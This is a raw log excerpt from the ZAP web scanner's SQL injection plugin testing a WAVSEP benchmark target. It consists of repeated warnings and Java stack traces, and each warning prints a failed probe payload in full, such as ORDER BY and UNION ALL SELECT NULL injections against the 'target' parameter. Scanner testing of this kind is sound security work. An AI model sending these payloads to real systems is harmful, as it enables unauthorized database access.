org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679372 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 9391-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 9391-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679373 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679374 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679375 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679376 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679377 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679378 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679378 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679383 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679385 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679386 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679387 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at 